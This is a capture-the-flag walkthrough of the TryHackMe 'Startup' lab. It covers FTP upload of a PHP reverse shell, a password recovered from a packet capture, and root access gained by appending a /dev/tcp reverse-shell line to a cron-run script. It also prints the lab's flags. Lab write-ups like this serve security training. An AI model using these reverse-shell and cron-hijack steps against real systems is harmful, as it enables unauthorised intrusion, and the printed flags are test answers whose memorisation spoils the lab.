TryHackme CTF: Startup

This is the walkthrough of "Startup" CTF of TryHackme.

The IP of this machine is 10.10.20.106, so first I am going to perform an Nmap scan.

The result of the Nmap scan is:

As we can see Anonymous login is allowed, so we will look into it before doing that, As port 80 is open I started Gobuster to enumerate all directories on the server, here is the result of that:

It shows that we can access the files directory.

Now we will login on ftp anonymously and check if we can exploit it or not. After login notice.txt file gives a username hint "maya" maybe we can use it somewhere. 'important.jpg' was of no use.

Let's visit the website and see what can get on the files directory:

Now let's check if we can upload a payload to get a reverse shell, so first download php reverse shell from pentest monkey it is a payload to get a reverse shell. Change the IP to your local IP address.

In FTP directory, we were able to put our payload:

Execute it on the website by clicking on it or by typing the name on the URL, before executing start a netcat listener on your local attacker machine.

I messed up something so I uploaded php reverse shell again on the ftp server named as "pay.php" and executed it on the URL and got connection on the netcat listener.

we can get a shell session by using the following command:

/bin/bash -i

What is the secret spicy soup recipe?

And we got our first answer love


What are the contents of user.txt?

In the home directory, there is a user lennie but I was not able to access it as it was asking for a password, I started looking in directories for any kind of hint or password.

There is a directory named incidents in which I found a pcapng file I downloaded it on my local machine and tried to look for data using Wireshark.

Using this password of lennie we can access lennie account.

and here we got the answer to the second question:

THM{03ce3d619b80ccbfb3b7fc81e46c0e79}


What are the contents of root.txt?

As there were no clear-cut instructions or hints, I read and traversed each file and directory.

Till now I have not been able to find any important hint to elevate privileges, so let's keep looking

There is a print.sh file which is owned by lennie but is executed by a cron job which is owned by Root, as can be seen, so I can modify print.sh file by which I can get a reverse shell connection on my machine.

Reverse shell command I searched online and pasted it on the terminal as follows:

echo " /bin/bash -i >& /dev/tcp/ip_address/1234 0>&1" >> /etc/print.sh

On our local machine, we need to have a Netcat listener ready to listen to the connection.

and we got our answer THM{f963aaa6a430f210222158ae15c3d76d}